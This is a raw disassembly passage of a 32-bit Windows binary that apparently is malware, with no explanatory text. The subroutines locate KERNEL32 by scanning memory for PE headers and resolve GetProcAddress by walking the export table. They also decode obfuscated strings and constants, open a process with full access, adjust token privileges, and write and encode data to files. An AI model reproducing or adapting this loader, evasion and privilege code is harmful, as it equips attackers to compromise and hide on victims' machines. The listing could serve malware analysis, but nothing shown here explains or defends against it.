mov esi, [eax]
call dword ptr [esi+8]
loc_4221B0: ; CODE XREF: sub_421545+AAC�j
mov eax, [ebp+var_70EF8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4221BC: ; CODE XREF: sub_421545+A71�j
inc [ebp+var_50EA0]
loc_4221C2: ; CODE XREF: sub_421545+A07�j
mov eax, [ebp+var_60EBC]
cmp [ebp+var_50EA0], eax
jb loc_421F51
loc_4221D4: ; CODE XREF: sub_421545+9F6�j
mov eax, [ebp+var_60EB0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4221E0: ; CODE XREF: sub_421545+9C9�j
mov eax, [ebp+var_60EC0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
movzx eax, [ebp+var_50E9B]
mov edx, ds:100141CCh
add edx, ds:10014188h
sub edx, 0Ah
cmp eax, edx
jz short loc_42224D
push 10014DB2h
call sub_41B08F
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000D024h
lea eax, [ebp+var_50E9B]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D024h
push 10014DADh
call sub_41B08F
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000D024h
add esp, 20h
loc_42224D: ; CODE XREF: sub_421545+465�j
; sub_421545+CBF�j
inc [ebp+var_30E50]
loc_422253: ; CODE XREF: sub_421545+3E9�j
mov eax, [ebp+var_30E58]
cmp [ebp+var_30E50], eax
jb loc_421933
loc_422265: ; CODE XREF: sub_421545+275�j
; sub_421545+300�j ...
inc [ebp+var_40E5C]
mov eax, [ebp+var_40E90]
cmp [ebp+var_40E5C], eax
jl loc_42177B
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:10013804h
pop ecx
push [ebp+var_30E44]
call dword ptr ds:10013D84h
push [ebp+var_30E48]
call dword ptr ds:10013D84h
loc_4222A3: ; CODE XREF: sub_421545+1DA�j
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4222AF: ; CODE XREF: sub_421545+1B5�j
mov eax, [ebp+var_40E6C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4222BB: ; CODE XREF: sub_421545+188�j
mov eax, [ebp+var_40E68]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4222C7: ; CODE XREF: sub_421545+B9�j
; sub_421545:loc_421652�j ...
mov eax, [ebp+var_40E64]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4222D3: ; CODE XREF: sub_421545+47�j
; sub_421545+8E�j
pop edi
pop esi
pop ebx
leave
retn
sub_421545 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4222D8 proc near ; CODE XREF: sub_41EF87+48A�p
var_104 = byte ptr -104h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push edi
mov eax, ds:100141CCh
mov dl, [ebp+arg_0]
mov [ebp+eax+var_100], dl
push 0
push 80h
push 4
push 0
mov eax, ds:100140B0h
sub eax, 9
push eax
push 40000000h
push 10011220h
call dword ptr ds:10013968h
mov edi, eax
push 0
lea eax, [ebp+var_104]
push eax
movsx eax, word ptr ds:10014130h
dec eax
push eax
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:10013D6Ch
push edi
call dword ptr ds:1001282Ch
pop edi
leave
retn
sub_4222D8 endp
; =============== S U B R O U T I N E =======================================
sub_422341 proc near ; CODE XREF: .data:0041A7D1�p
push edi
push 10014D9Fh
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10010598h
mov ds:10014270h, eax
test eax, eax
jnz short loc_422374
push 10014D91h
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10011208h
mov ds:10014270h, eax
loc_422374: ; CODE XREF: sub_422341+1A�j
cmp dword ptr ds:10014270h, 0
jz short loc_4223A2
movsx eax, word ptr ds:10014128h
movsx edx, word ptr ds:10014090h
add eax, edx
sub eax, 5
push eax
push dword ptr ds:10014270h
call dword ptr ds:100101ACh
mov ds:1000D020h, eax
loc_4223A2: ; CODE XREF: sub_422341+3A�j
pop edi
retn
sub_422341 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push edi
mov eax, ds:10014198h
movsx edx, word ptr ds:10014120h
add eax, edx
sub eax, 12h
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_4223DD
push 100100A0h
lea eax, [ebp-110h]
push eax
call sub_425D7D
jmp short loc_4223EE
; ---------------------------------------------------------------------------
loc_4223DD: ; CODE XREF: .data:004223C8�j
push 10011430h
lea eax, [ebp-110h]
push eax
call sub_425D7D
loc_4223EE: ; CODE XREF: .data:004223DB�j
push 0
mov eax, ds:10014134h
sub eax, 4
push eax
push 4
push 0
movsx eax, word ptr ds:10014130h
movsx edx, word ptr ds:10014098h
add eax, edx
sub eax, 7
push eax
push 40000000h
lea eax, [ebp-110h]
push eax
call dword ptr ds:10013968h
mov [ebp-8], eax
push 2
push 0
mov eax, ds:10014174h
sub eax, 2
push eax
push dword ptr [ebp-8]
call dword ptr ds:10013D80h
push 10014D89h
call sub_41B08F
pop ecx
push 0
lea edx, [ebp-0Ch]
push edx
mov edx, ds:1001422Ch
add edx, ds:100140ECh
sub edx, 6
push edx
push eax
push dword ptr [ebp-8]
call dword ptr ds:10013D6Ch
push 493E0h
push 40h
call dword ptr ds:100109ECh
mov ebx, eax
push 61A80h
push 40h
call dword ptr ds:100109ECh
mov esi, eax
mov eax, ds:10014244h
movsx edx, word ptr ds:10014120h
add eax, edx
sub eax, 12h
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_4224AC
mov eax, [ebp+8]
inc eax
push eax
push ebx
call sub_425D7D
jmp short loc_4224B5
; ---------------------------------------------------------------------------
loc_4224AC: ; CODE XREF: .data:0042249D�j
push dword ptr [ebp+8]
push ebx
call sub_425D7D
loc_4224B5: ; CODE XREF: .data:004224AA�j
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_4224BA: ; CODE XREF: .data:004224BF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4224BA
mov [ebp-4], eax
mov eax, ds:100141E8h
mov edi, eax
add edi, ds:1001409Ch
sub edi, 8
jmp short loc_4224FC
; ---------------------------------------------------------------------------
loc_4224D6: ; CODE XREF: .data:004224FF�j
movzx eax, byte ptr [ebx+edi]
mov [ebp-114h], eax
mov eax, edi
mul edi
mov [ebp-118h], eax
mov eax, [ebp-114h]
mov edx, [ebp-118h]
add eax, edx
mov [ebx+edi], al
inc edi
loc_4224FC: ; CODE XREF: .data:004224D4�j
cmp edi, [ebp-4]
jb short loc_4224D6
mov eax, ds:100140CCh
add eax, 61A76h
add eax, ds:100140A8h
push eax
push esi
push dword ptr [ebp-4]
push ebx
call sub_4247D1
add esp, 10h
movsx edi, word ptr ds:100140B8h
sub edi, 9
jmp short loc_422540
; ---------------------------------------------------------------------------
loc_42252B: ; CODE XREF: .data:0042254E�j
cmp byte ptr [esi+edi], 2Bh
jnz short loc_422535
mov byte ptr [esi+edi], 28h
loc_422535: ; CODE XREF: .data:0042252F�j
cmp byte ptr [esi+edi], 3Dh
jnz short loc_42253F
mov byte ptr [esi+edi], 29h
loc_42253F: ; CODE XREF: .data:00422539�j
inc edi
loc_422540: ; CODE XREF: .data:00422529�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_422545: ; CODE XREF: .data:0042254A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_422545
cmp edi, eax
jb short loc_42252B
mov eax, ds:100141B0h
sub eax, 7
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_42258E
push 10014D84h
call sub_41B08F
add esp, 4
push 0
lea edi, [ebp-0Ch]
push edi
mov edi, ds:1001422Ch
add edi, ds:100141E4h
sub edi, 4
push edi
push eax
push dword ptr [ebp-8]
call dword ptr ds:10013D6Ch
loc_42258E: ; CODE XREF: .data:0042255F�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_422593: ; CODE XREF: .data:00422598�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_422593
push 0
lea edx, [ebp-0Ch]
push edx
mov edx, ds:10014140h
add edx, ds:10014158h
sub edx, 10h
mov edi, eax
add edi, edx
push edi
push esi
push dword ptr [ebp-8]
call dword ptr ds:10013D6Ch
push dword ptr [ebp-8]
call dword ptr ds:1001282Ch
push ebx
call dword ptr ds:100105CCh
push esi
call dword ptr ds:100105CCh
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, ds:100141E8h
add eax, ds:100141C8h
sub eax, 9
cmp ds:10013D8Ch, eax
jbe short loc_4225FE
push 10013D8Ch
call dword ptr ds:1000D010h
loc_4225FE: ; CODE XREF: .data:004225F1�j
mov eax, ds:10013D8Ch
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422607 proc near ; CODE XREF: .data:00424D93�p
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_281 = byte ptr -281h
var_26C = byte ptr -26Ch
var_252 = byte ptr -252h
var_23D = byte ptr -23Dh
var_231 = byte ptr -231h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_21F = byte ptr -21Fh
var_21C = byte ptr -21Ch
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FE = byte ptr -0FEh
var_FD = byte ptr -0FDh
var_FC = byte ptr -0FCh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ds:100140E0h
add esi, 6
mov ecx, esi
add ecx, ds:1001413Ch
shr edi, cl
movsx esi, word ptr ds:10014144h
movsx edx, word ptr ds:10014128h
lea esi, [esi+edx+2]
mov ecx, esi
mov ebx, edi
shl ebx, cl
loc_422641: ; CODE XREF: sub_422607+55�j
; sub_422607+98�j ...
mov [ebp+var_114], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_42265E
mov eax, ds:10014134h
add eax, 0FFFCh
sub ebx, eax
jmp short loc_422641
; ---------------------------------------------------------------------------
loc_42265E: ; CODE XREF: sub_422607+47�j
mov eax, ds:10014184h
add eax, 38h
add eax, ds:100141D8h
mov edx, ebx
add edx, eax
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_118], edx
mov eax, [ebp+arg_0]
cmp edx, eax
jbe short loc_4226A1
movsx eax, word ptr ds:1001411Ch
mov edx, ds:10014234h
lea eax, [eax+edx+0FFF9h]
sub ebx, eax
jmp short loc_422641
; ---------------------------------------------------------------------------
loc_4226A1: ; CODE XREF: sub_422607+80�j
mov eax, [ebp+var_118]
mov [ebp+var_11C], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_4226C8
mov eax, ds:100141A4h
add eax, 0FFFFh
sub ebx, eax
jmp loc_422641
; ---------------------------------------------------------------------------
loc_4226C8: ; CODE XREF: sub_422607+AE�j
mov eax, [ebp+var_11C]
mov eax, [eax+78h]
mov [ebp+var_120], eax
mov ecx, ebx
add ecx, eax
mov [ebp+var_110], ecx
mov eax, ecx
mov edx, ebx
add edx, [eax+0Ch]
push edx
lea eax, [ebp+var_103]
push eax
call sub_425D7D
mov eax, ds:10014168h
add eax, ds:100141F8h
sub eax, 0Fh
mov [ebp+var_4], eax
jmp short loc_42272A
; ---------------------------------------------------------------------------
loc_422708: ; CODE XREF: sub_422607+142�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_103]
cmp al, 61h
jle short loc_422727
cmp al, 7Ah
jge short loc_422727
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_103]
sub byte ptr [eax], 20h
loc_422727: ; CODE XREF: sub_422607+10D�j
; sub_422607+111�j
inc [ebp+var_4]
loc_42272A: ; CODE XREF: sub_422607+FF�j
mov eax, [ebp+var_4]
movsx eax, [ebp+eax+var_103]
mov edx, ds:10014188h
movsx ecx, word ptr ds:10014228h
add edx, ecx
sub edx, 0Dh
cmp eax, edx
jnz short loc_422708
cmp [ebp+var_103], 4Bh
jnz short loc_422781
cmp [ebp+var_102], 45h
jnz short loc_422781
cmp [ebp+var_101], 52h
jnz short loc_422781
cmp [ebp+var_FE], 4Ch
jnz short loc_422781
cmp [ebp+var_FD], 33h
jnz short loc_422781
cmp [ebp+var_FC], 32h
jz short loc_422786
loc_422781: ; CODE XREF: sub_422607+14B�j
; sub_422607+154�j ...
jmp loc_4229AE
; ---------------------------------------------------------------------------
loc_422786: ; CODE XREF: sub_422607+178�j
mov eax, ds:100140D4h
movsx edx, word ptr ds:1001412Ch
add eax, edx
sub eax, 8
mov [ebp+var_108], eax
jmp loc_422999
; ---------------------------------------------------------------------------
loc_4227A2: ; CODE XREF: sub_422607+3A1�j
mov eax, [ebp+var_108]
mov ecx, ds:1001418Ch
add ecx, 3
mul ecx
mov [ebp+var_228], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+20h]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_224], edx
push edx
lea eax, [ebp+var_21F]
push eax
call sub_425D7D
movsx eax, word ptr ds:10014194h
mov edx, eax
add edx, ds:10014198h
cmp [ebp+edx+var_231], 47h
jnz loc_422993
movsx edx, word ptr ds:10014164h
cmp byte ptr [ebp+edx+var_224+3], 74h
jnz loc_422993
mov edx, ds:100140D4h
cmp [ebp+edx+var_21C], 50h
jnz loc_422993
cmp byte ptr [ebp+eax+var_224+2], 63h
jnz loc_422993
mov eax, ds:1001424Ch
add eax, ds:100141A4h
cmp byte ptr [ebp+eax+var_224+2], 41h
jnz loc_422993
mov eax, ds:100141A8h
add eax, ds:1001417Ch
cmp byte ptr [ebp+eax+var_228+2], 72h
jnz loc_422993
mov eax, [ebp+var_108]
mov ecx, ds:10014134h
add ecx, ds:100141E0h
sub ecx, 3
mul ecx
mov [ebp+var_288], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+24h]
mov [ebp+var_114], edx
movzx eax, word ptr [edx]
mov [ebp+var_22C], eax
mov ecx, ds:100140ACh
add ecx, ds:100140D4h
dec ecx
mul ecx
mov [ebp+var_28C], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+1Ch]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_230], edx
mov ds:10014254h, ebx
mov ds:100101ACh, edx
lea edi, [ebp+var_23D]
lea esi, ds:10014794h
mov ecx, 0Dh
rep movsb
lea edi, [ebp+var_252]
lea esi, ds:100147A1h
mov ecx, 15h
rep movsb
lea edi, [ebp+var_26C]
lea esi, ds:100147B6h
mov ecx, 0Dh
rep movsw
lea edi, [ebp+var_281]
lea esi, ds:100147D0h
mov ecx, 15h
rep movsb
lea eax, [ebp+var_23D]
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013D70h, eax
lea eax, [ebp+var_252]
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1001383Ch, eax
lea eax, [ebp+var_26C]
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1000EFB8h, eax
lea eax, [ebp+var_281]
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10012824h, eax
jmp short loc_4229AE
; ---------------------------------------------------------------------------
loc_422993: ; CODE XREF: sub_422607+1F5�j
; sub_422607+20A�j ...
inc [ebp+var_108]
loc_422999: ; CODE XREF: sub_422607+196�j
mov eax, [ebp+var_110]
mov eax, [eax+18h]
cmp [ebp+var_108], eax
jb loc_4227A2
loc_4229AE: ; CODE XREF: sub_422607:loc_422781�j
; sub_422607+38A�j
pop edi
pop esi
pop ebx
leave
retn
sub_422607 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4229B3 proc near ; CODE XREF: sub_41D305+24C�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
mov eax, ds:10014234h
add eax, ds:100140ACh
sub eax, 7
push eax
push [ebp+arg_8]
push [ebp+arg_0]
call sub_4239D8
add esp, 0Ch
mov [ebp+var_48], eax
test eax, eax
jnz loc_422C07
mov [ebp+var_18], 8
push 10014D74h
call sub_4230FC
pop ecx
push eax
call dword ptr ds:1000DFF8h
mov [ebp+var_10], eax
lea eax, [ebp+var_8]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_8]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
mov eax, ds:10014104h
sub eax, 4
cmp ebx, eax
jnz loc_422BEB
lea eax, [ebp+var_3C]
push eax
push 10015C54h
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100140ACh
add eax, ds:100140C0h
sub eax, 9
cmp ebx, eax
jnz loc_422BE2
mov [ebp+var_30], 2
movsx eax, word ptr ds:1001423Ch
add eax, ds:100140C0h
sub eax, 9
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_3C]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, ds:1001415Ch
add eax, ds:10014094h
sub eax, 2
cmp ebx, eax
jnz loc_422BD9
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push 10015C64h
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10014244h
add eax, ds:10014248h
sub eax, 9
cmp ebx, eax
jnz loc_422BD0
inc dword ptr ds:100105D0h
mov eax, ds:10014214h
add eax, 5
movsx edx, word ptr ds:100140B4h
add eax, edx
cmp ds:100105D0h, eax
jb short loc_422B23
mov eax, ds:1001410Ch
add eax, 0Ah
mov ds:100105D0h, eax
push [ebp+var_4]
call sub_41F5AB
pop ecx
jmp loc_422BC7
; ---------------------------------------------------------------------------
loc_422B23: ; CODE XREF: sub_4229B3+153�j
movsx eax, word ptr ds:10014148h
mov [ebp+var_4C], eax
lea eax, [ebp+var_44]
push eax
push dword ptr ds:10012814h
call sub_422C67
mov [ebp+var_34], eax
lea eax, [ebp+var_40]
push eax
push dword ptr ds:1000D018h
call sub_422C67
add esp, 10h
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_422B75
cmp [ebp+var_34], 0
jz short loc_422B75
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_44]
push [ebp+var_34]
call sub_423202
add esp, 10h
loc_422B75: ; CODE XREF: sub_4229B3+1A5�j
; sub_4229B3+1AB�j
cmp [ebp+var_40], 0
jz short loc_422B96
cmp [ebp+var_38], 0
jz short loc_422B96
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_40]
push [ebp+var_38]
call sub_423202
add esp, 10h
loc_422B96: ; CODE XREF: sub_4229B3+1C6�j
; sub_4229B3+1CC�j
push [ebp+var_34]
call dword ptr ds:100105CCh
push [ebp+var_38]
call dword ptr ds:100105CCh
movsx eax, word ptr ds:10014148h
add eax, ds:100140A4h
sub eax, 7
push eax
push [ebp+arg_8]
push [ebp+arg_0]
call sub_4239D8
add esp, 0Ch
loc_422BC7: ; CODE XREF: sub_4229B3+16B�j
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_422BD0: ; CODE XREF: sub_4229B3+130�j
mov eax, [ebp+var_1C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_422BD9: ; CODE XREF: sub_4229B3+FE�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_422BE2: ; CODE XREF: sub_4229B3+A2�j
mov eax, [ebp+var_8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_422BEB: ; CODE XREF: sub_4229B3+74�j
lea eax, [ebp+var_18]
push eax
call dword ptr ds:10013D84h
mov eax, ds:10014118h
add eax, ds:100140A8h
sub eax, 0Ah
cmp ebx, eax
jz short $+2
loc_422C07: ; CODE XREF: sub_4229B3+2B�j
pop edi
pop esi
pop ebx
leave
retn
sub_4229B3 endp
; =============== S U B R O U T I N E =======================================
sub_422C0C proc near ; CODE XREF: .data:0041A7CC�p
push edi
push 10014D67h
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10010598h
mov ds:1001426Ch, eax
test eax, eax
jnz short loc_422C3F
push 10014D5Ch
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10011208h
mov ds:1001426Ch, eax
loc_422C3F: ; CODE XREF: sub_422C0C+1A�j
cmp dword ptr ds:1001426Ch, 0
jz short loc_422C65
push 10014D46h
call sub_41B08F
pop ecx
push eax
push dword ptr ds:1001426Ch
call dword ptr ds:100101ACh
mov ds:100105B4h, eax
loc_422C65: ; CODE XREF: sub_422C0C+3A�j
pop edi
retn
sub_422C0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422C67 proc near ; CODE XREF: .data:0041E790�p
; sub_4229B3+184�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call dword ptr ds:10013968h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_422CAA
cmp [ebp+arg_4], 0
jz short loc_422CA6
mov eax, [ebp+arg_4]
movsx edx, word ptr ds:100140E8h
sub edx, 4
mov [eax], edx
loc_422CA6: ; CODE XREF: sub_422C67+2E�j
xor eax, eax
jmp short loc_422CEE
; ---------------------------------------------------------------------------
loc_422CAA: ; CODE XREF: sub_422C67+28�j
push 0
push edi
call dword ptr ds:100137F8h
mov esi, eax
add eax, 10h
push eax
push 40h
call dword ptr ds:100109ECh
mov ebx, eax
push 0
cmp [ebp+arg_4], 0
jz short loc_422CD3
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
jmp short loc_422CD9
; ---------------------------------------------------------------------------
loc_422CD3: ; CODE XREF: sub_422C67+62�j
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_422CD9: ; CODE XREF: sub_422C67+6A�j
push [ebp+var_8]
push esi
push ebx
push edi
call dword ptr ds:1000D02Ch
push edi
call dword ptr ds:1001282Ch
mov eax, ebx
loc_422CEE: ; CODE XREF: sub_422C67+41�j
pop edi
pop esi
pop ebx
leave
retn
sub_422C67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422CF3 proc near ; CODE XREF: .data:0041AA1A�p
var_68 = dword ptr -68h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push ebx
push esi
push edi
call sub_41B366
or eax, eax
jnz short loc_422D11
mov edi, ds:10014124h
dec edi
jmp loc_422EC1
; ---------------------------------------------------------------------------
loc_422D11: ; CODE XREF: sub_422CF3+10�j
call dword ptr ds:100109F8h
mov ebx, eax
push ebx
movsx eax, word ptr ds:100141C0h
sub eax, 9
push eax
push 1F0FFFh
call dword ptr ds:10013D7Ch
mov esi, eax
lea eax, [ebp+var_4]
push eax
push 28h
push esi
call dword ptr ds:10010080h
mov edi, eax
movsx eax, word ptr ds:100140B4h
add eax, ds:10014108h
sub eax, 0Dh
cmp edi, eax
jz loc_422EC1
mov edx, ds:100140FCh
add edx, ds:10014104h
mov ecx, ds:10014198h
sub ecx, 9
mov [ebp+edx*4+var_68], ecx
lea eax, [ebp+var_40]
push eax
push 28h
lea eax, [ebp+var_3C]
push eax
mov eax, ds:100140E0h
add eax, 13h
push eax
push [ebp+var_4]
call dword ptr ds:100137F0h
mov edi, eax
cmp [ebp+arg_0], 0
jz short loc_422DDA
mov eax, ds:100140A4h
sub eax, 9
cmp edi, eax
jnz short loc_422DAE
mov edi, ds:10014174h
dec edi
jmp loc_422EC1
; ---------------------------------------------------------------------------
loc_422DAE: ; CODE XREF: sub_422CF3+AD�j
mov edi, ds:100140C8h
dec edi
mov eax, ds:1001413Ch
add eax, ds:100141F8h
sub eax, 0Eh
cmp [ebp+var_3C], eax
jz loc_422EC1
mov edi, ds:1001419Ch
sub edi, 9
jmp loc_422EC1
; ---------------------------------------------------------------------------
loc_422DDA: ; CODE XREF: sub_422CF3+A1�j
cmp dword ptr ds:10014284h, 0
jnz short loc_422DFB
mov eax, ds:100140FCh
add eax, 3FF9h
push eax
push 40h
call dword ptr ds:100109ECh
mov ds:10014284h, eax
loc_422DFB: ; CODE XREF: sub_422CF3+EE�j
lea eax, [ebp+var_40]
push eax
mov eax, ds:10014234h
add eax, 3FFDh
push eax
push dword ptr ds:10014284h
push 1
push [ebp+var_4]
call dword ptr ds:100137F0h
cmp dword ptr ds:10014288h, 0
jnz short loc_422E33
push 14h
push 0
call dword ptr ds:100109ECh
mov ds:10014288h, eax
loc_422E33: ; CODE XREF: sub_422CF3+12F�j
push 1
push dword ptr ds:10014288h
call dword ptr ds:1000DFF4h
mov edi, eax
push 0
push 0
push 1
push dword ptr ds:10014288h
call dword ptr ds:100111E0h
mov edi, eax
push 0
mov eax, ds:10014284h
push dword ptr [eax]
push dword ptr ds:10014288h
call dword ptr ds:100109E8h
mov edi, eax
lea eax, [ebp+var_10]
push eax
push 10014D2Dh
push 0
call dword ptr ds:1000D01Ch
mov edi, eax
mov eax, ds:100141ACh
sub eax, 5
cmp edi, eax
jz short loc_422EC1
mov eax, ds:100140DCh
inc eax
mov [ebp+var_14], eax
mov [ebp+var_8], 2
push 0
push 0
mov eax, ds:1001414Ch
add eax, ds:10014178h
sub eax, 0Dh
push eax
lea eax, [ebp+var_14]
push eax
push 0
push [ebp+var_4]
call dword ptr ds:10012810h
mov edi, eax
loc_422EC1: ; CODE XREF: sub_422CF3+19�j
; sub_422CF3+60�j ...
push [ebp+var_4]
call dword ptr ds:1001282Ch
push esi
call dword ptr ds:1001282Ch
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_422CF3 endp
; =============== S U B R O U T I N E =======================================
sub_422ED8 proc near ; CODE XREF: .data:0041AA26�p
push 2
call sub_41B78D
push 0
call sub_41B78D
add esp, 8
retn
sub_422ED8 endp
; =============== S U B R O U T I N E =======================================
sub_422EEA proc near ; CODE XREF: .data:00424DD8�p
push edi
push 10014D1Fh
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10010598h
mov ds:10014258h, eax
test eax, eax
jnz short loc_422F1D
push 10014D11h
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10011208h
mov ds:10014258h, eax
loc_422F1D: ; CODE XREF: sub_422EEA+1A�j
push 10014D07h
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:1001380Ch, eax
push 10014CFCh
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:1000D034h, eax
push 10014CF4h
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:1000E008h, eax
push 10014CECh
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:100109F0h, eax
push 10014CE2h
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:100109E0h, eax
push 10014CD8h
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:10013828h, eax
push 10014CCEh
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:10012808h, eax
push 10014CC4h
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:10012818h, eax
push 10014CBCh
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:10013D90h, eax
push 10014CB3h
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:100137D0h, eax
push 10014CA9h
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:1000D024h, eax
push 10014C9Eh
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:10013810h, eax
push 10014C92h
call sub_41B08F
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:10011210h, eax
push 10014C88h
call sub_41B08F
add esp, 38h
push eax
push dword ptr ds:10014258h
call dword ptr ds:100101ACh
mov ds:100101A4h, eax
pop edi
retn
